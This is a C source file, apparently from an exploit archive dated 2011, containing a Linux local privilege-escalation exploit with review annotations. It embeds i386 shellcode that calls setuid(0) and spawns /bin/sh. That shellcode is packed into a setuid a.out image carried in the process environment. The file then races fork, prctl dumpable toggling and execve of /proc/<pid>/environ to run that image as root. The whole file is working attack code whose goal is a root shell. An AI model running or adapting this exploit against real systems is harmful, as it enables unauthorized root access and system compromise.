  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <fcntl.h>
  6. #include <errno.h>
  7. #include <sched.h>
  8. #include <sys/types.h>
  9. #include <sys/stat.h>
  10. #include <sys/prctl.h>
  11. #include <sys/mman.h>
  12. #include <sys/wait.h>
  13. #include <linux/a.out.h>
  14. #include <asm/unistd.h>
  15.  
  16.  
/* a.out header of the image built in main(); copied to the head of b[] */
static struct exec ex;
/* environment vector handed to execve(): the image in b[] split at every
   NUL byte, one string per run; the NULL terminator execve() needs comes
   from the memset in main() -- the last slot must stay untouched */
static char *e[256];
/* argv used both for the re-exec in main() and for the final execve of
   /proc/<pid>/environ in exploit() */
static char *a[4];
/* the a.out image: `ex` followed by the raw __excode shellcode bytes */
static char b[512];
/* scratch path buffer: this binary's absolute path in main(), later
   "/proc/<pid>/environ" in exploit() */
static char t[256];
/* go-flag living in a MAP_SHARED anonymous page: the parent increments it
   after fork(), the child spins on it before its execve */
static volatile int *c;
  23.  
  24.  
/* shell code: position-independent i386 payload that becomes the text
   segment of the a.out image built in main().  It does setuid(0) and then
   execve("/bin/sh"), locating its own data with a call/pop trick.  The
   argv array it passes (`arg`) lives inside the payload, so it writes to
   its own text -- NOTE(review): whether that page is writable when the
   image is finally executed is not verifiable from this file. */
__asm__ (" __excode: call 1f \n"          /* push the address of label 1 */
" 1: mov $23, %eax \n"                    /* i386 syscall 23: setuid */
" xor %ebx, %ebx \n"                      /* uid 0 */
" int $0x80 \n"                           /* setuid(0); result not checked */
" pop %eax \n"                            /* eax = runtime address of label 1 */
" mov $cmd-1b, %ebx \n"                   /* offset of cmd from label 1 ... */
" add %eax, %ebx \n"                      /* ... made absolute: ebx = &"/bin/sh" */
" mov $arg-1b, %ecx \n"                   /* same for arg: ecx = &arg */
" add %eax, %ecx \n"
" mov %ebx, (%ecx) \n"                    /* arg[0] = "/bin/sh" */
" mov %ecx, %edx \n"
" add $4, %edx \n"                        /* edx = &arg[1] (zero): envp */
" mov $11, %eax \n"                       /* i386 syscall 11: execve */
" int $0x80 \n"                           /* execve("/bin/sh", arg, &arg[1]) */
" mov $1, %eax \n"                        /* i386 syscall 1: exit, reached only if execve failed */
" int $0x80 \n"
" arg: .quad 0x00, 0x00 \n"               /* 16 zero bytes: arg[0] slot plus NULL terminators */
" cmd: .string \"/bin/sh\" \n"            /* NUL-terminated; the NUL is part of the image */
" __excode_e: nop \n"                     /* end marker; main() copies up to, not including, this byte */
" .global __excode \n"
" .global __excode_e \n"
);



/* C-visible handles for the payload's start and end labels.  Only their
   addresses are used: main() takes &__excode / &__excode_e to size and copy
   the bytes.  Nothing ever calls through these "function pointers". */
extern void (*__excode) (void);
extern void (*__excode_e) (void);
  53.  
  54.  
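/*
 * Report a failed call and abort the program.
 *
 * err: message prefix passed to perror(); errno is expected to describe
 *      the failure (callers raising a non-errno condition should set it).
 * Never returns: exits with status 1.
 *
 * NOTE(review): the name collides with glibc's error(3) from <error.h>;
 * that header is not included here, so it is harmless as long as it stays
 * that way.
 */
_Noreturn void
error (const char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}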
  62.  
  63.  
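/*
 * Second stage, run by the re-exec'd copy of this binary (see main()).  By
 * now the process environment is the tiny setuid a.out built in main(), so
 * /proc/<pid>/environ holds that image byte for byte; the child below tries
 * to execve() it.
 *
 * file: path of a large file used as ballast -- it is mapped and faulted
 *       in with madvise(MADV_WILLNEED) to load the machine while the attempt
 *       is in flight.
 * Never returns: exits 0 after the child finishes, or via error().
 *
 * NOTE(review): the listing does not say which kernel bug this races; the
 * call order (invalid execve, no-op madvise, dumpable toggled around fork)
 * is reproduced exactly from the original and should be treated as
 * load-bearing.  The only changes are checks on calls whose failure the
 * original ignored, so a bad argument fails loudly instead of running on
 * with an uninitialised `st`.
 */
void
exploit (char *file)
{
  int pid, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);

  /* result deliberately ignored, as in the original */
  (void) chmod ("/proc/self/environ", 04755);

  /* shared anonymous page for the go-flag; MAP_SHARED is what lets the
     parent's increment reach the child after fork() */
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (c == MAP_FAILED)
    error ("mmap flag page");
  memset ((void *) c, 0, 4096);

  /* slow down machine: map the ballast file for the MADV_WILLNEED below.
     The original never checked open()/fstat(), so a wrong path reached
     mmap() with a garbage size. */
  fd = open (file, O_RDONLY);
  if (fd < 0)
    error ("open");
  if (fstat (fd, &st) < 0)
    error ("fstat");
  p = mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");

  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  /* the child will exec *this* process's environ, so take the pid now */
  snprintf (t, sizeof (t), "/proc/%d/environ", getpid ());
  sched_yield ();
  /* NULL path: this execve fails by design; kept from the original */
  execve (NULL, a, e);
  /* zero-length madvise: also a no-op kept from the original */
  madvise (0, 0, MADV_WILLNEED);

  pid = fork ();
  if (pid < 0)
    error ("fork");

  /* give it a try */
  if (pid)
    {
      /* parent: raise the flag, generate load, make ourselves dumpable */
      (*c)++;
      if (madvise (p, st.st_size, MADV_WILLNEED) != 0)
        error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();
    }
  else
    {
      /* child: lower priority, spin until the parent raises the flag, then
         try to execute the parent's environ as an a.out */
      nice (10);
      while (!(*c))
        ;
      sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (pid, NULL, 0);
  exit (0);
}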
  112.  
  113.  
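/*
 * Entry point.  Works in two stages:
 *
 *   1. `binary <big file>`: build a minimal setuid a.out (NMAGIC i386 header
 *      followed by the __excode bytes) in b[], split it at every NUL into
 *      the environment vector e[], and re-execute this binary with that
 *      environment and argv = { av[0], av[0], av[1] }.
 *   2. The re-exec'd copy sees ac > 2 and hands av[2] (the big file) to
 *      exploit(), which never returns.
 *
 * The environment is the carrier: execve() lays the env strings out
 * back-to-back with a NUL after each, so /proc/<pid>/environ of the new
 * process reproduces the image bytes.
 *
 * Fixes over the original: argc is checked before av[1] is dereferenced
 * (it used to crash on a missing argument instead of printing usage); the
 * image copy and the e[] fill are bounded; the re-exec path is built with
 * snprintf() instead of unbounded strcat() into t[], and an absolute av[0]
 * is used as-is rather than glued behind the cwd.
 */
int
main (int ac, char **av)
{
  int i, j, k, s, n;
  char *p;

  if (ac < 2)
    error ("usage: binary <big file name>");

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);
  if (!a[0] || !a[1] || !a[2])
    error ("strdup");

  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /* make setuid a.out: text = the shellcode bytes; a_syms is deliberately
     negative, kept from the original */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = (int) ((char *) &__excode_e - (char *) &__excode);
  if (s <= 0 || (size_t) s + sizeof (ex) > sizeof (b))
    {
      errno = EINVAL;
      error ("shellcode does not fit the image buffer");
    }
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /* make environment: one string per NUL-terminated run of the image.
     e[] must keep its last slot NULL for execve(), hence the -1. */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
        {
          if (j >= (int) (sizeof (e) / sizeof (e[0])) - 1)
            {
              errno = E2BIG;
              error ("too many environment strings");
            }
          e[j++] = &p[k];
          k = i + 1;
        }
    }

  /* reexec: absolute path of this binary; relative av[0] is resolved
     against the cwd as the original did */
  if (av[0][0] == '/')
    n = snprintf (t, sizeof (t), "%s", av[0]);
  else
    {
      char cwd[sizeof (t)];
      if (!getcwd (cwd, sizeof (cwd)))
        error ("getcwd");
      n = snprintf (t, sizeof (t), "%s/%s", cwd, av[0]);
    }
  if (n < 0 || (size_t) n >= sizeof (t))
    {
      errno = ENAMETOOLONG;
      error ("binary path too long");
    }

  execve (t, a, e);
  error ("execve");
  return 0;
}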
  166.  
  167.  
  168. # [2011-10-09]
  169.  